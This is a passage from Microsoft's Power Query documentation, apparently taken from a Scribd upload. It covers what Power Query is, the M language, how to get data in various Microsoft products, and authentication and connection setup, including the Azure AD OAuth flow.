100% found this document useful (1 vote)
2K views1,995 pages

Power Query

Power Query is a data transformation and preparation engine that allows users to import, cleanse, and reshape data across Microsoft products like Excel, Power BI, and Analysis Services. It provides a graphical user interface for getting data from various sources and transforming it. Power Query uses the M query language behind the scenes to perform transformations. Dataflows offer a cloud-based version of Power Query that can store transformed data in services like Dataverse instead of only within a single product.

Uploaded by

Ajit Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
2K views1,995 pages

Power Query

Power Query is a data transformation and preparation engine that allows users to import, cleanse, and reshape data across Microsoft products like Excel, Power BI, and Analysis Services. It provides a graphical user interface for getting data from various sources and transforming it. Power Query uses the M query language behind the scenes to perform transformations. Dataflows offer a cloud-based version of Power Query that can store transformed data in services like Dataverse instead of only within a single product.

Uploaded by

Ajit Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1995

Tell us about your PDF experience.

Power Query documentation


Power Query is the data connectivity and data preparation technology that enables end
users to seamlessly import and reshape data from within a wide range of Microsoft
products, including Excel, Power BI, Analysis Services, Dataverse, and more.

Power Query Overview

e OVERVIEW

What is Power Query?

What are dataflows?

Using Power Query

c HOW-TO GUIDE

Use Power Query

Get data

Transform data

Working with dataflows

p CONCEPT

Create and use dataflows in the Power Platform

Dataflow licenses

Dataflow best practices

Advanced Power Query articles

p CONCEPT

Query folding
Query diagnostics

Error handling

Develop your custom connector

c HOW-TO GUIDE

Custom connector development

Custom connector certification

Reference content

i REFERENCE

Connectors in Power Query

M language reference
What is Power Query?
Article • 06/28/2023

Power Query is a data transformation and data preparation engine. Power Query comes
with a graphical interface for getting data from sources and a Power Query Editor for
applying transformations. Because the engine is available in many products and services,
the destination where the data will be stored depends on where Power Query was used.
Using Power Query, you can perform the extract, transform, and load (ETL) processing of
data.

How Power Query helps with data acquisition


Business users spend up to 80 percent of their time on data preparation, which delays
the work of analysis and decision-making. Several challenges contribute to this situation,
and Power Query helps address many of them.

Existing challenge How does Power Query help?

Finding and connecting to Power Query enables connectivity to a wide range of data
data is too difficult sources, including data of all sizes and shapes.
Existing challenge How does Power Query help?

Experiences for data Consistency of experience, and parity of query capabilities over all
connectivity are too data sources.
fragmented

Data often needs to be Highly interactive and intuitive experience for rapidly and
reshaped before iteratively building queries over any data source, of any size.
consumption

Any shaping is one-off and When using Power Query to access and transform data, you
not repeatable define a repeatable process (query) that can be easily refreshed in
the future to get up-to-date data.
In the event that you need to modify the process or query to
account for underlying data or schema changes, you can use the
same interactive and intuitive experience you used when you
initially defined the query.

Volume (data sizes), velocity Power Query offers the ability to work against a subset of the
(rate of change), and variety entire dataset to define the required data transformations,
(breadth of data sources and allowing you to easily filter down and transform your data to a
data shapes) manageable size.
Power Query queries can be refreshed manually or by taking
advantage of scheduled refresh capabilities in specific products
(such as Power BI) or even programmatically (by using the Excel
object model).
Because Power Query provides connectivity to hundreds of data
sources and over 350 different types of data transformations for
each of these sources, you can work with data from any source
and in any shape.

Power Query experiences


The Power Query user experience is provided through the Power Query Editor user
interface. The goal of this interface is to help you apply the transformations you need
simply by interacting with a user-friendly set of ribbons, menus, buttons, and other
interactive components.

The Power Query Editor is the primary data preparation experience, where you can
connect to a wide range of data sources and apply hundreds of different data
transformations by previewing data and selecting transformations from the UI. These
data transformation capabilities are common across all data sources, whatever the
underlying data source limitations.

When you create a new transformation step by interacting with the components of the
Power Query interface, Power Query automatically creates the M code required to do
the transformation so you don't need to write any code.

Currently, two Power Query experiences are available:

Power Query Online—Found in integrations such as Power BI dataflows, Microsoft


Power Platform dataflows, Azure Data Factory wrangling dataflows, and many
more that provide the experience through an online webpage.
Power Query for Desktop—Found in integrations such as Power Query for Excel
and Power BI Desktop.

7 Note

Although two Power Query experiences exist, they both provide almost the same
user experience in every scenario.

Transformations
The transformation engine in Power Query includes many prebuilt transformation
functions that can be used through the graphical interface of the Power Query Editor.
These transformations can be as simple as removing a column or filtering rows, or as
common as using the first row as a table header. There are also advanced
transformation options such as merge, append, group by, pivot, and unpivot.

All these transformations are made possible by choosing the transformation option in
the menu, and then applying the options required for that transformation. The following
illustration shows a few of the transformations available in Power Query Editor.

More information: Quickstart: Using Power Query in Power BI

Dataflows
Power Query can be used in many products, such as Power BI and Excel. However, using
Power Query within a product limits its usage to only that specific product. Dataflows
are a product-agnostic service version of the Power Query experience that runs in the
cloud. Using dataflows, you can get data and transform data in the same way, but
instead of sending the output to Power BI or Excel, you can store the output in other
storage options such as Dataverse or Azure Data Lake Storage. This way, you can use the
output of dataflows in other products and services.

More information: What are dataflows?

Power Query M formula language


In any data transformation scenario, there are some transformations that can't be done
in the best way by using the graphical editor. Some of these transformations might
require special configurations and settings that the graphical interface doesn't currently
support. The Power Query engine uses a scripting language behind the scenes for all
Power Query transformations: the Power Query M formula language, also known as M.

The M language is the data transformation language of Power Query. Anything that
happens in the query is ultimately written in M. If you want to do advanced
transformations using the Power Query engine, you can use the Advanced Editor to
access the script of the query and modify it as you want. If you find that the user
interface functions and transformations won't perform the exact changes you need, use
the Advanced Editor and the M language to fine-tune your functions and
transformations.

Power Query M

let
Source = Exchange.Contents("[email protected]"),
Mail1 = Source{[Name="Mail"]}[Data],
#"Expanded Sender" = Table.ExpandRecordColumn(Mail1, "Sender", {"Name"},
{"Name"}),
#"Filtered Rows" = Table.SelectRows(#"Expanded Sender", each
([HasAttachments] = true)),
#"Filtered Rows1" = Table.SelectRows(#"Filtered Rows", each ([Subject] =
"sample files for email PQ test") and ([Folder Path] = "\Inbox\")),
#"Removed Other Columns" = Table.SelectColumns(#"Filtered Rows1",
{"Attachments"}),
#"Expanded Attachments" = Table.ExpandTableColumn(#"Removed Other
Columns", "Attachments", {"Name", "AttachmentContent"}, {"Name",
"AttachmentContent"}),
#"Filtered Hidden Files1" = Table.SelectRows(#"Expanded Attachments",
each [Attributes]?[Hidden]? <> true),
#"Invoke Custom Function1" = Table.AddColumn(#"Filtered Hidden Files1",
"Transform File from Mail", each #"Transform File from Mail"
([AttachmentContent])),
#"Removed Other Columns1" = Table.SelectColumns(#"Invoke Custom
Function1", {"Transform File from Mail"}),
#"Expanded Table Column1" = Table.ExpandTableColumn(#"Removed Other
Columns1", "Transform File from Mail", Table.ColumnNames(#"Transform File
from Mail"(#"Sample File"))),
#"Changed Type" = Table.TransformColumnTypes(#"Expanded Table Column1",
{{"Column1", type text}, {"Column2", type text}, {"Column3", type text},
{"Column4", type text}, {"Column5", type text}, {"Column6", type text},
{"Column7", type text}, {"Column8", type text}, {"Column9", type text},
{"Column10", type text}})
in
#"Changed Type"

More information: Power Query M formula language

Where can you use Power Query?


The following table lists Microsoft products and services where Power Query can be
found.

Product M engine1 Power Query Power Query Dataflows4


Desktop2 Online3

Excel for Windows Yes Yes No No

Excel for Mac Yes Yes No No

Power BI Yes Yes Yes Yes

Power Apps Yes No Yes Yes

Power Automate Yes No Yes No

Power BI Report Server Yes Yes No No

Azure Data Factory Yes No Yes Yes

Data Factory in Microsoft Fabric Yes No Yes Yes

SQL Server Integration Services Yes No No No

SQL Server Analysis Services Yes Yes No No

Dynamics 365 Customer Insights Yes No Yes Yes

1M engine The underlying query execution engine that runs queries expressed in
the Power Query formula language ("M").

2Power Query Desktop The Power Query experience found in desktop applications.

3Power Query Online The Power Query experience found in web browser applications.
4Dataflows Power Query as a service that runs in the cloud and is product-agnostic.
The stored result can be used in other applications as services.

See also
Data sources in Power Query
Getting data
Power Query quickstart
Shape and combine data using Power Query
What are dataflows
Getting data overview
Article • 04/10/2023

Power Query can connect to many different data sources so you can work with the data
you need. This article walks you through the steps for bringing in data to Power Query
either in Power Query Desktop or Power Query Online.

Connecting to a data source with Power Query follows a standard set of stages before
landing the data at a destination. This article describes each of these stages.

) Important

In some cases, a connector might have all stages of the get data experience, and in
other cases a connector might have just a few of them. For more information about
the experience of a specific connector, go to the documentation available for the
specific connector by searching on the Connectors in Power Query article.

Power Query Desktop experience


The stages for getting data in the Power Query Desktop experiences are:

1. Connection settings

2. Authentication

3. Data preview

4. Query destination

1. Connection settings
Most connectors initially require at least one parameter to initialize a connection to the
data source. For example, the SQL Server connector requires at least the host name to
establish a connection to the SQL Server database.
In comparison, when trying to connect to an Excel file, Power Query requires that you
use the file path to find the file you want to connect to.

The connector parameters are commonly used to establish a connection to a data


source, and they—in conjunction with the connector used—define what's called a data
source path.

7 Note

Some connectors don't require you to enter any parameters at all. These are called
singleton connectors and will only have one data source path available per
environment. Some examples are Adobe Analytics, MailChimp, and Google
Analytics.

2. Authentication
Every single connection that's made in Power Query has to be authenticated. The
authentication methods vary from connector to connector, and some connectors might
offer multiple methods of authentication.

The currently available methods of authentication for Power Query are:

Anonymous: Commonly used when connecting to a data source that doesn't


require user authentication, such as a webpage or a file available over public HTTP.
Basic: A username and password sent in base64 encoding are accepted for
authentication.
API Key: A single API key is accepted for authentication.
Organizational account or Microsoft account: This method is also known as
OAuth 2.0.
Windows: Can be implicit or explicit.
Database: This is only available in some database connectors.

For example, the available authentication methods for the SQL Server database
connector are Windows, Database, and Microsoft account.

3. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.

Depending on the connector that you're using, you can preview data by using either:

Navigator window
Table preview dialog box

Navigator window (navigation table)


The Navigator window consists of two main sections:

The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.

7 Note

For Power Query in Excel, select the Select multiple items option from the
upper-left corner of the navigation window to select more than one object at
a time in the object selection pane.
7 Note

The list of objects in Power Query Desktop is limited to 10,000 items. This limit
does not exist in Power Query Online. For a workaround in Power Query
Desktop, see Object limitation workaround.

The data preview pane on the right side of the window shows a preview of the
data from the object you selected.

Object limitation workaround

There’s a fixed limit of 10,000 objects in the Navigator in Power Query Desktop. This
limit doesn’t occur in Power Query Online. Eventually, the Power Query Online UI will
replace the one in the desktop.

In the interim, you can use the following workaround:

1. Right-click on the root node of the Navigator, and then select Transform Data.
2. Power Query Editor then opens with the full navigation table in the table preview
area. This view doesn't have a limit on the number of objects, and you can use
filters or any other Power Query transforms to explore the list and find the rows
you want (for example, based on the Name column).

3. Upon finding the item you want, you can get at the contents by selecting the data
link (such as the Table link in the following image).

Table preview dialog box


The table preview dialog box consists of only one section for the data preview. An
example of a connector that provides this experience and window is the Folder
connector.

4. Query destination
This is the stage in which you specify where to load the query. The options vary from
integration to integration, but the one option that's always available is loading data to
the Power Query editor to further transform and enrich the query.
Power Query Online experience
The stages for getting data in Power Query Online are:

1. Connection settings and Authentication

2. Data preview

3. Query editor

1. Connection settings and authentication


In the Power Query Online experience, you begin with the Connect to data source page
where you enter values in two distinct sections:

Connection settings

Connection credentials

Connection settings
In the connection settings section, you define the information needed to establish a
connection to your data source. Depending on your connector, that could be the name
of the server, the name of a database, a folder path, a file path, or other information
required by the connector to establish a connection to your data source. Some
connectors also enable specific subsections or advanced options to give you more
control and options when connecting to your data source.
Connection credentials
The first time that you use Power Query to connect to a specific data source, you're
required to create a new connection associated with that data source. A connection is
the full definition of the gateway, credentials, privacy levels, and other connector-
specific fields that make up the connection credentials required to establish a
connection to your data source.

7 Note

Some connectors offer specific fields inside the connection credentials section to
enable or define any sort of security related to the connection that needs to be
established. For example, the SQL Server connector offers the Use Encrypted
Connection field.
The primary information required by all connectors to define a connection are:

Connection name: This is the name that you can define to uniquely identify your
connections. Note that you can't duplicate the name of a connection in your
environment.
Data gateway: If your data source requires a data gateway, select the gateway
using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, as well as fields where you enter your credentials. For this example, the
Windows authentication kind has been selected and you can see the Username
and Password fields that need to be filled in to establish a connection.
Privacy level: You can define the privacy level for your data source to be either
None, Private, Organizational, or Public.
7 Note

To learn more about what data gateways are and how to register a new gateway for
your environment or tenant, go to Using on-premises data gateway.

) Important

Some Power Query integrations don't currently enable a defined connection or a


privacy level. But, all Power Query Online experiences do provide a way to define
the data gateway, authentication kind, and the credentials needed to establish a
connection with your data source.

Once you've defined a connection in Power Query Online, you can reuse the same
connection later on without reentering all this information again. The Connection field
offers a dropdown menu where you select your already defined connections. Once
you've selected your already defined connection, you don't need to enter any other
details before selecting Next.

After you select a connection from this menu, you can also make changes to the
credentials, privacy level, and other connector-specific fields for your data source in your
project. Select Edit connection, and then change any of the provided fields.
2. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.

Depending on the connector that you're using, you can preview data by using either:

Navigator window
Table preview dialog box

Navigator window (navigation table) in Power Query Online


The Navigator window consists of two main sections:

The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.

The data preview pane on the right side of the window shows a preview of the
data from the object you selected.

Table preview dialog box in Power Query Online


The table preview dialog box consists of only one section for the data preview. An
example of a connector that provides this experience and window is the Folder
connector.

3. Query editor
For Power Query Online, you're required to load the data into the Power Query editor
where you can further transform and enrich the query if you choose to do so.

Additional information
To better understand how to get data using the different product integrations of Power
Query, go to Where to get data.
Where to get data
Article • 07/28/2023

Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides basic steps for getting data from each of the
Microsoft products that include Power Query.

7 Note

Each of these Power Query get data experiences contain different feature sets.
More information: Where can you use Power Query?

Get data in Power BI Desktop


The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.

In Power BI Desktop, you can also directly select an Excel worksheet, a Power BI dataset,
a SQL server database, or Dataverse data without using the Get data option. You can
also enter data directly in a table, or select from a data source that was recently used.

Get data in Excel (Windows or Mac)


To get data in Excel for Windows or Excel for Mac:

1. From the Data ribbon, select Get Data.

2. Scroll through the category selections in the get data context menu, and select the
connector you want to use.
You'll then be asked to fill out information that's required for you to access the data. Go
to the individual connector articles for more information about this required
information.

In Excel, you can also directly select Text/CVS, Web, and Excel worksheet data without
using the Get Data option. You can also select from a data source that was recently used
and from existing connections or tables.

7 Note

Not all Excel versions support all of the same Power Query connectors. For a
complete list of the Power Query connectors supported by all versions of Excel for
Windows and Excel for Mac, go to Power Query data sources in Excel versions .
Get data in Power BI service
To get data in Power BI service:

1. On the left side of Power BI service, select Workspaces (but not My Workspace).

2. From the Workspace context menu, select the workspace you want to use.

3. From the workspace (in this example, TestWorkspace01), select the context menu
next to +New.

4. From the New context menu, select Dataflow.

5. From Define new tables, select Add new tables.

6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.

7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data in Power Apps


There are several places in Power Apps where you can get data, either by importing data
to a table or by creating a dataflow.

To import data to a new table in Power Apps:

1. On the left side of Power Apps, select Dataverse > Tables.


2. In the Tables pane, at the top left, select Import > Import data.

You can also choose to get data directly from an Excel worksheet without using the
Import data option.

3. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.

4. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

To import data to an existing table in Power Apps:

1. On the left side of Power Apps, select Dataverse > Tables.

2. In the Tables pane, either:

Select a table in the Tables pane that you want to import data to, and then
select Import > Import data.
Open the table to its individual pane, and then select Import > Import data.

In either case, you can also choose to get data from an Excel worksheet without
using the Import data option.

3. Select the connector from the list of data sources.

To get data in Power Apps when creating a dataflow:

1. On the left side of Power Apps, select Dataverse > Dataflows.


2. If a dataflow already exists:
a. Double-click on the dataflow.
b. From the Power Query editor, select Get data.
c. Select the connector from the list of data sources.

3. If no dataflow exists and you want to create a new dataflow:

a. Select New dataflow.

b. In the New dataflow dialog box, enter a name for your new dataflow.

c. Select Create.

d. Select the connector from the list of data sources.

Get data in Dynamics 365 Customer Insights


To get data in Customer Insights:

1. On the left side of Customer Insights, select Data > Data sources.

2. In the Data sources pane, select Add data source.

3. In Choose your import method, choose Microsoft Power Query.

4. In Save data source as, enter a name for your data source.

5. Select Next.

6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.

7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data from Data Factory in Microsoft Fabric


(Preview)
To get data in Data Factory:

1. On the left side of Data Factory, select Workspaces (but not My Workspace).

2. From your Data Factory workspace, select New > Dataflow Gen2 (Preview) to
create a new dataflow.

3. In Power Query, either select Get data in the ribbon or select Get data from
another source in the current view.

4. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right hand side the connector to see a list
of all the connectors available in Power BI service.

5. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data in Analysis Services


With Analysis Services, a solution is developed in Visual Studio with the Analysis Services
projects extension. The solution is then deployed to SQL Server Analysis Services, Azure
Analysis Services, or a Power BI Premium workspace.

The Analysis Services documentation contains the following information that describes
the process for getting data:
To set up a Visual Studio solution with the Analysis Services projects extension:
Create a tabular model project

To get data: Get data

Get data in Power Automate


There are a couple of places in Power Automate where you can get data, either by
importing tables or in process adviser.

To get data by importing tables:

1. On the left side of Power Automate, select Data > Tables. At this point, a new tab
with Power Apps will open in your browser.

2. In the Power Apps tab, follow the instructions for importing data to either a new
table or to an existing table in the Power Apps section.

For information about how to get data in process advisor, go to Connect to a data
source.

Get data in Azure Data Factory


Azure Data Factory doesn't use the same Power Query get data interface as the other
apps described in this article. Instead, Azure Data Factory uses its own built-in
functionality to import data.

However, Azure Data Factory does use Power Query to transform data in data wrangling.
The following Azure Data Factory articles describe how to use Power Query for data
wrangling:

What is data wrangling?


Power Query activity in Azure Data Factory
Prepare data with data wrangling

Get data in SQL Server Integration Services


SQL Server Integration Services (SSIS) doesn't use the same Power Query get data
interface as the other apps described in this article. Instead, SSIS uses its own built-in
functionality to import data.
For information on installing, configuring, and using the Power Query Source for SSIS,
go to Power Query Source.
Get data experience
Article • 09/22/2023

Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides an explanation of the different modules in the
modern get data experience.

7 Note

Each of these Power Query get data experiences contain different feature sets.
More information: Where can you use Power Query?

Modern get data experience


The get data experience allows you to discover and connect to your data.

The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.

The new modular experience in Power Query Online is separated into different modules
located on the left side navigation bar. These modules include:

Home (all)
Templates (Power BI service only)
OneLake Data Hub (Fabric only)
New (all)
Upload (all)
Blank Table (all)
Blank Query (all)

Home
The home page acts as a summary of all the modules and presents you with different
options to expedite the process and get you closer to your data. Typically, this module
contains any existing data sources and gives you the option to use a new data source,
table, and upload files. From the home page, you can select View more on the right side
of the New sources and OneLake data hub sections to visit those modules.

Templates
A dataflow template provides a predefined set of entities and field mappings to enable
flow of data from your source to the destination, in the Common Data Model. A
dataflow template commoditizes the movement of data, which in turn reduces overall
burden and cost for a business user. It provides you with a head start to ingest data
wherein you don’t need to worry about knowing and mapping the source and
destination entities and fields—we do it for you, through dataflow templates. For more
information about templates, go to Introducing dataflow templates; A quick and
efficient way to build your sales leaderboard and get visibility over your sales pipeline .

OneLake data hub


The OneLake data hub makes it easy to find, explore, and use the Fabric data items in
your organization that you have access to. It provides information about the items and
entry points for working with them. For more information on the OneLake data hub, go
to OneLake Data Hub.

New
The new module provides a full list of connectors that you can select from. On this page,
you can search for a connector across all categories by using the search bar at the top of
page. You can also navigate across the categories to find a specific connector to
integrate with. Selecting a connector here opens the connection settings window, which
begins the process of connecting. For more information on using connectors, go to
Getting data overview.

Upload
The Upload module lets you upload your files directly. The following connectors support
this capability:

Excel
JSON
PDF
Text/CSV
XML

This module is an extension of this capability and lets you select the browse button to
upload a local file, or even drag and drop a file. For more information on uploading files,
go to Upload a file.

Blank table
The Blank table module provides a quick start in creating a table in a dataflow.

Blank query
The Blank query module lets you write or paste your own M script to create a new
query.
Authentication with a data source
Article • 02/17/2023

When you attempt to connect to a data source using a new connector for the first time,
you might be asked to select the authentication method to use when accessing the
data. After you've selected the authentication method, you won't be asked to select an
authentication method for the connector using the specified connection parameters.
However, if you need to change the authentication method later, you can do so.

Select an authentication method


Different connectors show different authentication methods. For example, the OData
Feed connector in Power BI Desktop and Excel displays the following authentication
method dialog box.

If you're using a connector from an online app, such as the Power BI service or Power
Apps, you'll see an authentication method dialog box for the OData Feed connector that
looks something like the following image.
As you can see, a different selection of authentication methods is presented from an
online app. Also, some connectors might ask you to enter the name of an on-premises
data gateway to be able to connect to your data.

Set the level of the authentication method


In connectors that require you to enter a URL, you'll be asked to select the level to which
the authentication method will be applied. For example, if you select the Web connector
with a URL of https://contoso.com/2020data/List_of_countries_and_capitals , the
default level setting for your authentication method will be https://contoso.com .

The level you select for the authentication method you chose for this connector
determines what part of a URL will have the authentication method applied to it. If you
select the top-level web address, the authentication method you select for this
connector will be used for that URL address or any subaddress within that address.
However, you might not want to set the top-level address to a specific authentication
method because different subaddresses can require different authentication methods.
One example might be if you were accessing two separate folders of a single SharePoint
site and wanted to use different Microsoft accounts to access each one.

After you've set the authentication method for a connector's specific address, you won't
need to select the authentication method for that connector using that URL address or
any subaddress again. For example, let's say you select the https://contoso.com/
address as the level you want the Web connector URL settings to apply to. Whenever
you use a Web connector to access any webpage that begins with this address, you
won't be required to select the authentication method again.

Change the authentication method


In some cases, you might need to change the authentication method you use in a
connector to access a specific data source.

To edit the authentication method in Power BI Desktop or Excel

1. Do one of the following:

In Power BI Desktop, on the File tab, select Options and settings > Data
source settings.
In Excel, on the Data tab, select Get Data > Data Source Settings.

2. In the Data source settings dialog box, select Global permissions, choose the
website where you want to change the permission setting, and then select Edit
Permissions.

3. In the Edit Permissions dialog box, under Credentials, select Edit.


4. Change the credentials to the type required by the website, select Save, and then
select OK.

You can also delete the credentials for a particular website in step 3 by selecting Clear
Permissions for a selected website, or by selecting Clear All Permissions for all of the
listed websites.

To edit the authentication method in online services, such as for dataflows in the
Power BI service and Microsoft Power Platform

1. Select the connector, and then select Edit connection.

2. Make the required changes, and then select Next.


Connecting with Azure Active Directory using
the Web and OData connectors
When connecting to data sources and services that require authentication through
OAuth or Azure Active Directory-based authentication, in certain cases where the service
is configured correctly, you can use the built-in Web or OData connectors to
authenticate and connect to data without requiring a service-specific or custom
connector.

This section outlines connection symptoms when the service isn't configured properly. It
also provides information on how Power Query interacts with the service when it's
properly configured.

Symptoms when the service isn't configured properly


If you run into the error We were unable to connect because this credential type isn’t
supported for this resource. Please choose another credential type, this error means
that your service doesn't support the authentication type.

One example of this is the Northwind OData service.

1. Enter the Northwind endpoint in the "Get Data" experience using the OData
connector.

2. Select OK to enter the authentication experience. Normally, because Northwind


isn’t an authenticated service, you would just use Anonymous. To demonstrate lack
of support for Azure Active Directory, choose Organizational account, and then
select Sign in.
3. You'll encounter the error, indicating that OAuth or Azure Active Directory
authentication isn't supported in the service.

Supported workflow
One example of a supported service working properly with OAuth is CRM, for example,
https://*.crm.dynamics.com/api/data/v8.2 .

1. Enter the URL in the "Get Data" experience using the OData connector.
2. Select Organizational Account, and then select Sign-in to proceed to connect
using OAuth.

3. The request succeeds and the OAuth flow continues to allow you to authenticate
successfully.

When you select Sign-in in Step 2 above, Power Query sends a request to the provided
URL endpoint with an Authorization header with an empty bearer token.

GET https://*.crm.dynamics.com/api/data/v8.2 HTTP/1.1


Authorization: Bearer
User-Agent: Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?
LinkID=304225)
Host: pbi.crm.dynamics.com
Connection: Keep-Alive

The service is then expected to respond with a 401 response with a WWW_Authenticate
header indicating the Azure AD authorization URI to use. This response should include
the tenant to sign into, or /common/ if the resource isn’t associated with a specific
tenant.
HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server:
WWW-Authenticate: Bearer
authorization_uri=https://login.microsoftonline.com/3df2eaf6-33d0-4a10-8ce8-
7e596000ebe7/oauth2/authorize
Date: Wed, 15 Aug 2018 15:02:04 GMT
Content-Length: 49

Power Query can then initiate the OAuth flow against the authorization_uri. Power
Query requests an Azure AD Resource or Audience value equal to the domain of the
URL being requested. This value would be the value you use for your Azure Application
ID URL value in your API/service registration. For example, if accessing
https://api.myservice.com/path/to/data/api , Power Query would expect your

Application ID URL value to be equal to https://api.myservice.com .

The following Azure Active Directory client IDs are used by Power Query. You might
need to explicitly allow these client IDs to access your service and API, depending on
your overall Azure Active Directory settings.

Client ID Title Description

a672d62c-fc7b-4e81-a576- Power Query for Excel Public client, used in Power BI Desktop
e60dc46e951d and Gateway.

b52893c8-bc2e-47fc-918b- Power BI Data Refresh Confidential client, used in Power BI


77022b299bbc service.

7ab7862c-4c57-491e-8a45- Power Apps and Confidential client, used in Power Apps


d52a7e023983 Power Automate and Power Automate.

You might need to explicitly allow these client IDs to access your service and API,
depending on your overall Azure Active Directory settings. Go to step 8 of Add a scope
for more details.

If you need more control over the OAuth flow (for example, if your service must respond
with a 302 rather than a 401 ), or if your application’s Application ID URL or Azure AD
Resource value don't match the URL of your service, then you’d need to use a custom
connector. For more information about using our built-in Azure AD flow, go to Azure
Active Directory authentication.
Connections and authentication in
Power Query Online
Article • 02/17/2023

In Power Query Online, a connection refers to the unique identifier and associated
credentials used to establish a connection to a particular data source. One convenient
feature of connections in Power Query is that you can create multiple connections
against the same data source with different credentials.

There are two categories of connections:

Connection Icon Description


category name
Connection Icon Description
category name

Cloud Any connection for data source that's cloud-based and


doesn't use a gateway.

On-premises Any connection that requires a gateway.

Creating a connection
During the get data experience in Power Query Online, you'll find a dialog where you
enter information to create and establish a connection to your data source. The process
is standard for all connectors in Power Query, but some connectors might require more
information in order to create a connection.

Creating a cloud connection


Using the Azure SQL Server database connector as an example, you can enter the
connector settings to establish a connection. For the Azure SQL Server connector, the
required setting is just the server name, but you can also enter the name of the
database and select any other advanced options available for the connector.

After entering the values for the connector settings in the Connection settings section,
you can proceed with the Connection credentials section. In this section, you can create
a connection specific to the connection settings you previously entered.
The following table contains the fields and values used in the Connection settings
section.

Field Description Sample value

Connection The name you can enter for your new connection. Sample
Name Connection

Data Gateway An optional field that lets you bind a gateway to your none
connection. For cloud connections, there's no gateway
binding to the connection.

Authentication The authentication kind you select to use that's supported Organizational
Kind by the connector. account

Credentials Depending on the authentication kind you select, there will Derived from
be available a contextual set of fields to input your OAuth2 flow, but
credentials, a button to launch an OAuth2 flow, or even no is shown as a
fields at all for an authentication kind such as Anonymous. Sign in button in
the image
7 Note

By default, the field for the connection name tries to provide a default name when
you create a connection using the information from the connection settings.

After finishing the Connection settings section, you select the Next button to move
forward in the get data experience.

 Tip

Some connectors provide an auto sign in experience. To learn more about this
feature, go to auto sign in.

Creating an on-premises connection


As an alternative, you can also bind a gateway to your connection, which converts your
connection from a cloud connection to an on-premises connection.

7 Note

To create a gateway you can read the article on using an on-premises data
gateway in dataflows.

Using a local SQL Server database as an example, you enter the connector settings to
establish a connection. For the SQL Server connector, the required setting is just the
server name, but you can also enter the name of the database and select any other
advanced options available for the connector. For demonstration purposes, both the
server name and database have been entered.
After entering the values for the connector in Connection settings, you can proceed
with the Connection credentials section. In this section, you can create a connection
specific to the connection settings you previously entered.

The following table contains the fields and values used in the Connection settings
section.

Field Description Sample value

Connection The name you can enter for your new localhost;AdventureWorks2019
Name connection

Data Gateway An optional field that lets you bind a gateway Mike Test
to your connection.

Authentication The authentication kind you select to use Basic


Kind that's supported by the connector.
Field Description Sample value

Credentials Depending on the authentication kind Username and password


selected, there will be available a contextual
set of fields to input your credentials, a button
to launch an OAuth2 flow, or even no fields at
all for an authentication kind such as
Anonymous.

After finishing the Connection settings section, you select the Next button to move
forward within the get data experience.

Components of a connection
Each connection is made up of a set of components. The following table contains more
information for each component.

Component Required Description Sample


name or
optional

Data Source Required The data source for which the connection is SQL Server, File,
kind being established. Folder, Azure
Data Lake
Storage

Data Source Required A string that represents the values or Server Name,
path parameters used to establish a connection to Database Name
your data source.

Authentication Required Encompasses both the authentication method Windows,


and the credentials used for authentication. OAuth2,
Anonymous

Gateway Optional Used when a gateway is needed to establish the Any gateway
connection and execute any query evaluation.

Privacy level Optional Establishes the security for each connection, None, Public,
which is taken into consideration when queries Organizational,
from different connections are combined. Private

) Important

Currently, the privacy level is set to None for any new connections created. When
you try to combine multiple data sources, a new dialog prompts you to define the
data privacy levels of the data sources that you want to combine.
Known connections
When Power Query recognizes a set of connection settings, it tries to look up in its
respective credentials storage to see if there's a connection that matches those settings
and, if so, automatically selects that connection.

To override this behavior, you can take either of the following two actions:

Display the dropdown menu to scan a list of available connections for the given
connection settings. You can then select the one that you'd like to use or create a
new one.
Select Edit connection to modify the existing connection or select Create new
connection from the dropdown menu to create a new named connection.
More resources
List of connectors in Power Query
On-premises data gateways documentation
Change the gateway used in a dataflow
Troubleshooting dataflow issues: Connection to the data source
Auto sign in for Azure Active Directory
data sources
Article • 10/06/2022

The auto sign-in feature attempts to automatically sign you in as the current user when
connecting to data sources in Power Query that use Azure Active Directory as one of
their authentication kinds. It does this auto sign-in to expedite the authentication
process and minimize the time it takes to start working with your data.

More technically, the auto sign-in feature for Azure Active Directory data sources uses
the information derived from the currently authenticated user in the Power Query
Online experience. This information is then used to request a new access token for a
